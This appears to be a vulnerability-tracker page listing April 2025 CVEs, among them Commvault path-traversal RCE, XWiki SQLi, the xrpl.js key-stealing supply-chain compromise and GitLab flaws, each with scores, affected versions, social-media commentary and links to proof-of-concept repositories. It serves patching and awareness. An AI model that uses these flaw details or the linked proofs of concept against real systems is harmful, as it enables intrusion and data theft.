This SQLi in Centreon Web is from a month ago but the CVE was published today.

thewatch.centreon.com/latest-s

sev:HIGH 7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon centreon-web (User configuration form modules) allows SQL Injection.

A user with high privileges is able to become administrator by intercepting the contact form request and altering its payload.

This issue affects Centreon: from 22.10.0 before 22.10.28, from 23.04.0 before 23.04.25, from 23.10.0 before 23.10.20, from 24.04.0 before 24.04.10, from 24.10.0 before 24.10.4.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2024-12244
(4.3 MEDIUM)

EPSS: 0.01%

updated 2025-04-24T09:30:40

1 posts

An issue has been discovered in access controls could allow users to view certain restricted project information even when related features are disabled in GitLab EE, affecting all versions from 17.7 prior to 17.9.7, 17.10 prior to 17.10.5, and 17.11 prior to 17.11.1.

beyondmachines1@infosec.exchange at 2025-04-25T09:01:35.000Z ##

GitLab releases security patches for multiple Vulnerabilities

GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.

**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-1908
(7.7 HIGH)

EPSS: 0.01%

updated 2025-04-24T09:30:40

1 posts

An issue has been discovered in GitLab EE/CE that could allow an attacker to track users' browsing activities, potentially leading to full account take-over, affecting all versions from 16.6 before 17.9.7, 17.10 before 17.10.5, and 17.11 before 17.11.1.

beyondmachines1@infosec.exchange at 2025-04-25T09:01:35.000Z ##

GitLab releases security patches for multiple Vulnerabilities

GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.

**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-0639
(6.5 MEDIUM)

EPSS: 0.03%

updated 2025-04-24T09:30:40

1 posts

An issue has been discovered affecting service availability via issue preview in GitLab CE/EE affecting all versions from 16.7 before 17.9.7, 17.10 before 17.10.5, and 17.11 before 17.11.1.

beyondmachines1@infosec.exchange at 2025-04-25T09:01:35.000Z ##

GitLab releases security patches for multiple Vulnerabilities

GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.

**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-32730
(5.5 MEDIUM)

EPSS: 0.03%

updated 2025-04-24T09:30:40

1 posts

Use of hard-coded cryptographic key vulnerability in i-PRO Configuration Tool affects the network system for i-PRO Co., Ltd. surveillance cameras and recorders. This vulnerability allows a local authenticated attacker to use the authentication information from the last connected surveillance cameras and recorders.

cR0w@infosec.exchange at 2025-04-24T12:26:05.000Z ##

Hardcoded keys in PHYSEC devices strikes again.

jvn.jp/en/jp/JVN84627857/

i-pro.com/products_and_solutio

sev:MED 6.8 - CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Use of hard-coded cryptographic key vulnerability in i-PRO Configuration Tool affects the network system for i-PRO Co., Ltd. surveillance cameras and recorders. This vulnerability allows a local authenticated attacker to use the authentication information from the last connected surveillance cameras and recorders.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-1731
(7.8 HIGH)

EPSS: 0.01%

updated 2025-04-24T06:30:31

4 posts

An incorrect permission assignment vulnerability in the PostgreSQL commands of the USG FLEX H series uOS firmware versions from V1.20 through V1.31 could allow an authenticated local attacker with low privileges to gain access to the Linux shell and escalate their privileges by crafting malicious scripts or modifying system configurations with administrator-level access through a stolen token. Mod

_r_netsec@infosec.exchange at 2025-04-24T00:43:06.000Z ##

Authenticated Remote Code Execution on USG FLEX H Series (CVE-2025-1731 / CVE-2025-1732) 0xdeadc0de.xyz/blog/cve-2025-1

##

cR0w@infosec.exchange at 2025-04-23T13:00:04.000Z ##

@Dio9sys @da_667 Adding this link to the Zyxel vuln above: security.humanativaspa.it/loca

##

_r_netsec@infosec.exchange at 2025-04-23T05:43:06.000Z ##

Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731) security.humanativaspa.it/loca

##

oversecurity@mastodon.social at 2025-04-23T05:40:07.000Z ##

Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731)

“So we wait, this is our […]

🔗️ [Humanativaspa] link.is.it/ubmq0d

##

CVE-2025-1976(CVSS UNKNOWN)

EPSS: 0.03%

updated 2025-04-24T03:31:38

1 posts

Brocade Fabric OS versions starting with 9.1.0 have root access removed, however, a local user with admin privilege can potentially execute arbitrary code with full root privileges on Fabric OS versions 9.1.0 through 9.1.1d6.

cR0w@infosec.exchange at 2025-04-24T12:35:26.000Z ##

This is one of those CVEs that I think the score is higher than the actual risk to most orgs but IDK, we all have different use cases and configurations.

support.broadcom.com/web/ecx/s

sev:HIGH 8.8 - CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Brocade Fabric OS versions starting with 9.1.0 have root access removed, however, a local user with admin privilege can potentially execute arbitrary code with full root privileges on Fabric OS versions 9.1.0 through 9.1.1d6.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-46419
(5.9 MEDIUM)

EPSS: 0.06%

updated 2025-04-24T03:31:38

1 posts

Westermo WeOS 5 through 5.23.0 allows a reboot via a malformed ESP packet.

CVE-2025-32818
(7.5 HIGH)

EPSS: 0.04%

updated 2025-04-23T21:30:42

1 posts

A Null Pointer Dereference vulnerability in the SonicOS SSLVPN Virtual office interface allows a remote, unauthenticated attacker to crash the firewall, potentially leading to a Denial-of-Service (DoS) condition.

cR0w@infosec.exchange at 2025-04-23T19:48:57.000Z ##

SonicWALL SSLVPN DoS.

psirt.global.sonicwall.com/vul

sev:HIGH 7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

A Null Pointer Dereference vulnerability in the SonicOS SSLVPN Virtual office interface allows a remote, unauthenticated attacker to crash the firewall, potentially leading to a Denial-of-Service (DoS) condition.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-32969(CVSS UNKNOWN)

EPSS: 0.24%

updated 2025-04-23T19:15:38

1 posts

### Impact It is possible for a remote unauthenticated user to escape from the HQL execution context and perform a blind SQL injection to execute arbitrary SQL statements on the database backend, including when "Prevent unregistered users from viewing pages, regardless of the page rights" and "Prevent unregistered users from editing pages, regardless of the page rights" options are enabled. Depe

cR0w@infosec.exchange at 2025-04-23T16:44:33.000Z ##

SQLi in XWiki.

github.com/xwiki/xwiki-platfor

sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

XWiki is a generic wiki platform. In versions starting from 1.8 and prior to 15.10.16, 16.4.6, and 16.10.1, it is possible for a remote unauthenticated user to escape from the HQL execution context and perform a blind SQL injection to execute arbitrary SQL statements on the database backend, including when "Prevent unregistered users from viewing pages, regardless of the page rights" and "Prevent unregistered users from editing pages, regardless of the page rights" options are enabled. Depending on the used database backend, the attacker may be able to not only obtain confidential information such as password hashes from the database, but also execute UPDATE/INSERT/DELETE queries. This issue has been patched in versions 16.10.1, 16.4.6 and 15.10.16. There is no known workaround, other than upgrading XWiki.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-2773
(7.2 HIGH)

EPSS: 0.33%

updated 2025-04-23T18:31:07

1 posts

BEC Technologies Multiple Routers sys ping Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of BEC Technologies Multiple Routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the management

CVE-2025-2772
(5.3 MEDIUM)

EPSS: 0.03%

updated 2025-04-23T18:31:07

1 posts

BEC Technologies Multiple Routers Insufficiently Protected Credentials Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of BEC Technologies routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within /cgi-bin/tools_usermanage.asp. The issue results from

CVE-2025-2770
(4.9 MEDIUM)

EPSS: 0.10%

updated 2025-04-23T18:31:06

1 posts

BEC Technologies Multiple Routers Cleartext Password Storage Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of BEC Technologies routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from storing credentials in a

CVE-2025-2771
(5.3 MEDIUM)

EPSS: 0.10%

updated 2025-04-23T18:31:06

1 posts

BEC Technologies Multiple Routers Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of BEC Technologies routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of authentication prior to allowing access to fun

CVE-2025-2767
(8.8 HIGH)

EPSS: 0.21%

updated 2025-04-23T18:31:00

1 posts

Arista NG Firewall User-Agent Cross-Site Scripting Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Minimal user interaction is required to exploit this vulnerability. The specific flaw exists within the processing of the User-Agent HTTP header. The issue results from the lack of proper valid

cR0w@infosec.exchange at 2025-04-23T17:55:28.000Z ##

Arista NG Firewall XSS -> RCE.

cc: @Dio9sys @da_667

zerodayinitiative.com/advisori

sev:HIGH 8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Arista NG Firewall User-Agent Cross-Site Scripting Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Minimal user interaction is required to exploit this vulnerability. The specific flaw exists within the processing of the User-Agent HTTP header. The issue results from the lack of proper validation of user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-24407.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-27087
(5.5 MEDIUM)

EPSS: 0.01%

updated 2025-04-23T15:32:02

1 posts

A vulnerability in the kernel of the Cray Operating System (COS) could allow an attacker to perform a local Denial of Service (DoS) attack.

cR0w@infosec.exchange at 2025-04-22T21:54:06.000Z ##

This is unlikely to impact anyone, but it's a CVE for Cray OS. In 2025. I like it.

support.hpe.com/hpesc/public/d

sev:MED 5.1 -
CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

A vulnerability in the kernel of the Cray Operating System (COS) could allow an attacker to perform a local Denial of Service (DoS) attack.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2024-33452
(7.7 HIGH)

EPSS: 0.11%

updated 2025-04-23T14:08:13.383000

1 posts

An issue in OpenResty lua-nginx-module v.0.10.26 and before allows a remote attacker to conduct HTTP request smuggling via a crafted HEAD request.

cR0w@infosec.exchange at 2025-04-22T16:53:08.000Z ##

HTTP request smuggling in OpenResty lua-nginx-module. But even if you don't care about that, check out the blog post ( with PoC ). It has a cat that chases the cursor around the screen and I love it so much.

benasin.space/2025/03/18/OpenR

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-1951
(8.4 HIGH)

EPSS: 0.01%

updated 2025-04-23T14:08:13.383000

1 posts

IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands as a privileged user due to execution of commands with unnecessary privileges.

cR0w@infosec.exchange at 2025-04-22T15:56:48.000Z ##

Heads-up if you or your target run IBM Hardware Management Console.

ibm.com/support/pages/node/723

sev:CRIT 9.3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands locally due to improper validation of libraries of an untrusted source.

nvd.nist.gov/vuln/detail/CVE-2

ibm.com/support/pages/node/723

sev:HIGH 8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands as a privileged user due to execution of commands with unnecessary privileges.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-29660
(9.8 CRITICAL)

EPSS: 0.07%

updated 2025-04-23T14:08:13.383000

1 posts

A vulnerability exists in the daemon process of the Yi IOT XY-3820 v6.0.24.10, which exposes a TCP service on port 6789. This service lacks proper input validation, allowing attackers to execute arbitrary scripts present on the device by sending specially crafted TCP requests using directory traversal techniques.

CVE-2025-29659
(9.8 CRITICAL)

EPSS: 0.21%

updated 2025-04-23T14:08:13.383000

1 posts

Yi IOT XY-3820 6.0.24.10 is vulnerable to Remote Command Execution via the "cmd_listen" function located in the "cmd" binary.

CVE-2025-2703
(6.8 MEDIUM)

EPSS: 0.01%

updated 2025-04-23T12:31:31

2 posts

The built-in XY Chart plugin is vulnerable to a DOM XSS vulnerability. A user with Editor permissions is able to modify such a panel in order to make it execute arbitrary JavaScript.

SonarResearch@infosec.exchange at 2025-04-24T15:02:41.000Z ##

📊⚠️ Data in danger!

We found an XSS vulnerability in Grafana with the help of SonarQube. Learn about the details in our latest blog post:

sonarsource.com/blog/data-in-d

#appsec #security #vulnerability

##

cR0w@infosec.exchange at 2025-04-23T13:29:19.000Z ##

Some of y'all use Grafana, right?

grafana.com/security/security-

sev:MED 6.8 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L

The built-in XY Chart plugin is vulnerable to a DOM XSS vulnerability.

A user with Editor permissions is able to modify such a panel in order to make it execute arbitrary JavaScript.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-2595
(5.3 MEDIUM)

EPSS: 0.02%

updated 2025-04-23T09:33:37

1 posts

An unauthenticated remote attacker can bypass the user management in CODESYS Visualization and read visualization template files or static elements by means of forced browsing.

cR0w@infosec.exchange at 2025-04-23T12:42:54.000Z ##

Ooh, more CODESYS.

certvde.com/en/advisories/VDE-

sev:MED 5.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

An unauthenticated remote attacker can bypass the user management in CODESYS Visualization and read visualization template files or static elements by means of forced browsing.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-0926
(5.9 MEDIUM)

EPSS: 0.01%

updated 2025-04-23T06:31:26

1 posts

Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has found that it is possible for a non-admin user to remove system files causing a boot loop by redirecting a file deletion when recording video. Axis has released a patched version for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.

cR0w@infosec.exchange at 2025-04-23T12:46:36.000Z ##

A couple CVEs in Axis Camera Station Pro.

axis.com/dam/public/e4/2e/b2/c

sev:MED 6.1 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has identified an issue with a specific file that the server is using. A non-admin user can modify this file to either create files or change the content of files in an admin-protected location.
Axis has released a patched version for the highlighted flaw. Please
refer to the Axis security advisory for more information and solution.

nvd.nist.gov/vuln/detail/CVE-2

axis.com/dam/public/9d/fe/3f/c

sev:MED 5.9 - CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H

Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has found that it is possible for a non-admin user to remove system files causing a boot loop by redirecting a file deletion when recording video.
Axis has released a patched version for the highlighted flaw. Please
refer to the Axis security advisory for more information and solution.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-1056
(6.1 MEDIUM)

EPSS: 0.01%

updated 2025-04-23T06:31:26

1 posts

Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has identified an issue with a specific file that the server is using. A non-admin user can modify this file to either create files or change the content of files in an admin-protected location. Axis has released a patched version for the highlighted flaw. Please refer to the Axis security advisory for more information and solution

cR0w@infosec.exchange at 2025-04-23T12:46:36.000Z ##

A couple CVEs in Axis Camera Station Pro.

axis.com/dam/public/e4/2e/b2/c

sev:MED 6.1 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has identified an issue with a specific file that the server is using. A non-admin user can modify this file to either create files or change the content of files in an admin-protected location.
Axis has released a patched version for the highlighted flaw. Please
refer to the Axis security advisory for more information and solution.

nvd.nist.gov/vuln/detail/CVE-2

axis.com/dam/public/9d/fe/3f/c

sev:MED 5.9 - CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H

Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has found that it is possible for a non-admin user to remove system files causing a boot loop by redirecting a file deletion when recording video.
Axis has released a patched version for the highlighted flaw. Please
refer to the Axis security advisory for more information and solution.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-46221(CVSS UNKNOWN)

EPSS: 0.00%

updated 2025-04-23T03:30:35

1 posts

Rejected reason: Not used

adulau@infosec.exchange at 2025-04-23T07:33:06.000Z ##

While digging into some #Fortinet vulnerabilities, I discovered a set of CVEs that were rejected for being unused.

I'm wondering how this is actually helping vulnerability management. Does this mean those will be never used? or something else?

#vulnerability #cve #vulnerabilities

🔗 vulnerability.circl.lu/vuln/cv

##

CVE-2025-1021
(7.5 HIGH)

EPSS: 0.04%

updated 2025-04-23T03:30:30

1 posts

Missing authorization vulnerability in synocopy in Synology DiskStation Manager (DSM) before 7.1.1-42962-8, 7.2.1-69057-7 and 7.2.2-72806-3 allows remote attackers to read arbitrary files via unspecified vectors.

cR0w@infosec.exchange at 2025-04-23T03:06:10.000Z ##

Synology again.

synology.com/en-global/securit

sev:HIGH 7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Missing authorization vulnerability in synocopy in Synology DiskStation Manager (DSM) before 7.1.1-42962-8, 7.2.1-69057-7 and 7.2.2-72806-3 allows remote attackers to read arbitrary files via unspecified vectors.

I assume "unspecified vectors" is code for "basic shit we're too embarrassed to disclose."

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-32965(CVSS UNKNOWN)

EPSS: 0.04%

updated 2025-04-22T23:53:56

1 posts

### Impact Versions 4.2.1, 4.2.2, 4.2.3, and 4.2.4 of xrpl.js were compromised and contained malicious code designed to exfiltrate private keys. If you are using one of these versions, stop immediately and rotate any private keys or secrets used with affected systems. Version 2.14.2 is also malicious, though it is less likely to lead to exploitation as it is not compatible with other 2.x versions

1 repos

https://github.com/yusufdalbudak/CVE-2025-32965-xrpl-js-poc

cR0w@infosec.exchange at 2025-04-22T20:52:55.000Z ##

Go hack cryptocurrency shit.

github.com/XRPLF/xrpl.js/secur

sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

xrpl.js is a JavaScript/TypeScript API for interacting with the XRP Ledger in Node.js and the browser. Versions 4.2.1, 4.2.2, 4.2.3, and 4.2.4 of xrpl.js were compromised and contained malicious code designed to exfiltrate private keys. Version 2.14.2 is also malicious, though it is less likely to lead to exploitation as it is not compatible with other 2.x versions. Anyone who used one of these versions should stop immediately and rotate any private keys or secrets used with affected systems. Users of xrpl.js should pgrade to version 4.2.5 or 2.14.3 to receive a patch. To secure funds, think carefully about whether any keys may have been compromised by this supply chain attack, and mitigate by sending funds to secure wallets, and/or rotating keys. If any account's master key is potentially compromised, disable the key.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-34028
(10.0 CRITICAL)

EPSS: 0.31%

updated 2025-04-22T18:32:18

13 posts

A path traversal vulnerability in Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files, which, when expanded by the target server, result in Remote Code Execution. This issue affects Command Center Innovation Release: 11.38.

2 repos

https://github.com/tinkerlev/commvault-cve2025-34028-check

https://github.com/watchtowrlabs/watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028

AAKL at 2025-04-25T15:48:47.137Z ##

Arctic Wolf, from yesterday: CVE-2025-34028: PoC Released for Critical RCE Vulnerability in Commvault Command Center arcticwolf.com/resources/blog/

##

AAKL@infosec.exchange at 2025-04-25T15:48:47.000Z ##

Arctic Wolf, from yesterday: CVE-2025-34028: PoC Released for Critical RCE Vulnerability in Commvault Command Center arcticwolf.com/resources/blog/ #cybersecurity #infosec

##

jos1264@social.skynetcloud.site at 2025-04-25T11:50:03.000Z ##

Critical Commvault Flaw Rated 10/10: CSA Urges Immediate Patching thecyberexpress.com/commvault- #CommonVulnerabilityScoringSystem #CommvaultVulnerability #TheCyberExpressNews #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202534028 #CyberNews #CSA

##

soc_prime@infosec.exchange at 2025-04-25T11:12:41.000Z ##

CVE-2025-34028, a maximum-severity #RCE #vulnerability in the Command Center, poses a severe risk to impacted instances and may result in a full system compromise. Detect exploitation attempts with #Sigma rules from SOC Prime Platform.
socprime.com/blog/detect-cve-2

##

beyondmachines1@infosec.exchange at 2025-04-25T08:01:35.000Z ##

Critical vulnerability reported in Commvault Command Center

A critical unauthenticated remote code execution vulnerability (CVE-2025-34028) in Commvault's Command Center allows attackers to force vulnerable systems to download, unzip, and execute malicious code, leading to complete system compromise. The flaw affects Commvault Command Center Innovation Release versions 11.38.0-11.38.19 on both Windows and Linux.

**If you are using Commvault Command Center Innovation Release versions 11.38.0 to 11.38.19, patch IMMEDIATELY. Naturally, make sure the system is isolated from the internet and accessible only from trusted networks. But even with isolation, someone will find your Commvault eventually - through phishing or malware. So don't delay - patch.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

jos1264@social.skynetcloud.site at 2025-04-24T22:25:01.000Z ##

Commvault Command Center Path Traversal Vulnerability (CVE-2025-34028) fortiguard.fortinet.com/threat

##

jos1264@social.skynetcloud.site at 2025-04-24T20:30:02.000Z ##

CVE-2025-34028 Detection: A Maximum-Severity Vulnerability in the Commvault Command Center Enables RCE – Source: socprime.com ciso2ciso.com/cve-2025-34028-d #rssfeedpostgeneratorecho #CyberSecurityNews #CVE-2025-34028 #Latestthreats #Vulnerability #socprimecom #socprime #Blog #CVE #rce

##

AAKL@infosec.exchange at 2025-04-24T14:25:59.000Z ##

New.

WatchTower: Fire In The Hole, We’re Breaching The Vault - Commvault Remote Code Execution (CVE-2025-34028) labs.watchtowr.com/fire-in-the

More:

Infosecurity-Magazine: Highest-Risk Security Flaw Found in Commvault Backup Solutions infosecurity-magazine.com/news #cybersecurity #Infosec

##

jos1264@social.skynetcloud.site at 2025-04-24T13:00:03.000Z ##

Critical Commvault RCE vulnerability fixed, PoC available (CVE-2025-34028) helpnetsecurity.com/2025/04/24 #dataprotection #vulnerability #Don'tmiss #Commvault #WatchTowr #Hotstuff #backup #News #PoC

##

cR0w@infosec.exchange at 2025-04-24T12:40:01.000Z ##

Yet another good write-up by watchTowr Labs. This time it was with Commvault. So patch it if you have it, hack it if you don't. And vendors: Take note of the communication and turnaround time in here.

labs.watchtowr.com/fire-in-the

Edit to fix a dumb typo.

##

0x40k@infosec.exchange at 2025-04-24T12:32:05.000Z ##

Whoa, that Commvault SSRF to RCE vulnerability is *ugly*! 😬 We're talking CVE-2025-34028, slapped with a 9.0 CVSS score. Yeah, that's definitely setting off all the alarm bells!

Here's the lowdown: An SSRF vulnerability in "deployWebpackage.do" isn't being filtered properly. What does that mean? Attackers can just upload a ZIP file containing a JSP payload, and *boom* – they get remote code execution. It's a stark reminder that backup systems, unfortunately, are often prime targets precisely because they get overlooked.

So, listen up: If you're running Commvault Command Center versions anywhere from 11.38.0 up to 11.38.19, you need to patch immediately. Get yourself onto version 11.38.20 or 11.38.25 right away! And while you're at it, take a good look at your configuration settings. Good news is, watchTowr Labs has put out a detection tool – definitely make use of that!

Just a friendly reminder on best practices, too: Your backup systems absolutely belong in their own, separate network segment. Crucially, regular penetration tests are a must; don't just rely on automated scans, they simply won't cut it for stuff like this. That's just how it is. 🤷

How about you? Got Commvault deployed? Have you already checked your setup against this vulnerability? What kind of hardening measures do you have in place for your backup infrastructure? Drop your thoughts below! 👇

#Cybersecurity #Pentesting #Commvault

##

_r_netsec@infosec.exchange at 2025-04-24T10:13:06.000Z ##

Fire In The Hole, We’re Breaching The Vault - Commvault Remote Code Execution (CVE-2025-34028) - watchTowr Labs labs.watchtowr.com/fire-in-the

##

cR0w@infosec.exchange at 2025-04-22T16:59:23.000Z ##

It feels like it's been a while since we've had a perfect 10 ../ and I'm glad we have another one to celebrate. 🥳

documentation.commvault.com/se

sev:CRIT 10.0 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H

A path traversal vulnerability in Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files, which, when expanded by the target server, result in Remote Code Execution.

nvd.nist.gov/vuln/detail/CVE-2

Edit for dumb typo.

##

CVE-2025-27086
(8.1 HIGH)

EPSS: 0.06%

updated 2025-04-22T15:31:59

2 posts

Vulnerability in Hewlett Packard Enterprise HPE Performance Cluster Manager (HPCM).This issue affects HPE Performance Cluster Manager (HPCM): through 1.12.

beyondmachines1@infosec.exchange at 2025-04-23T10:01:06.000Z ##

Authentication bypass vulnerability reported in HPE Performance Cluster Manager (HPCM)

Authentication bypass vulnerability in HPE Performance Cluster Manager (CVE-2025-27086, CVSS 8.1) allows attackers to exploit Remote Method Invocation in the GUI component to gain unauthorized privileged access to affected systems (version 1.12 and earlier). HPE is recommending immediate upgrade to version 1.13 or implementing a temporary mitigation - disabling the vulnerable RMI service.

**If you are running HPE Clusters and are using HPE Performance Cluster Manager, time to patch it ASAP. Although the flaw is not scored as critical, an authentication bypass to the Cluster Manager can be a nasty vector of attack. Naturally, make sure it's only accessible from isolated and trusted networks. Then patch.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

cR0w@infosec.exchange at 2025-04-21T18:27:53.000Z ##

Remote auth bypass in HPE Performance Cluster Manager.

support.hpe.com/hpesc/public/d

sev:HIGH 8.1 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Vulnerability in Hewlett Packard Enterprise HPE Performance Cluster Manager (HPCM).This issue affects HPE Performance Cluster Manager (HPCM): through 1.12.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-1950
(9.4 CRITICAL)

EPSS: 0.01%

updated 2025-04-22T15:30:58

2 posts

IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands locally due to improper validation of libraries of an untrusted source.

beyondmachines1@infosec.exchange at 2025-04-24T11:01:35.000Z ##

Multiple vulnerabilities reported in IBM Hardware Management Console

IBM has patched multiple security vulnerabilities in its Power Hardware Management Console (HMC), including a critical flaw (CVE-2025-1950, CVSS 9.3) that allows local users to execute commands with elevated privileges due to improper validation.

**First, make sure your IBM Hardware Management Console (HMC) is isolated and accessible only from trusted networks and trusted personnel. Also check whether you are running vulnerable versions (V10.2.1030.0 and V10.3.1050.0). If you are, plan a patch cycle, because any isolation will eventually be breached.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

cR0w@infosec.exchange at 2025-04-22T15:56:48.000Z ##

Heads-up if you or your target run IBM Hardware Management Console.

ibm.com/support/pages/node/723

sev:CRIT 9.3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands locally due to improper validation of libraries of an untrusted source.

nvd.nist.gov/vuln/detail/CVE-2

ibm.com/support/pages/node/723

sev:HIGH 8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands as a privileged user due to execution of commands with unnecessary privileges.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-1732
(6.7 MEDIUM)

EPSS: 0.01%

updated 2025-04-22T03:30:32

1 posts

An improper privilege management vulnerability in the recovery function of the USG FLEX H series uOS firmware version V1.31 and earlier could allow an authenticated local attacker with administrator privileges to upload a crafted configuration file and escalate privileges on a vulnerable device.

_r_netsec@infosec.exchange at 2025-04-24T00:43:06.000Z ##

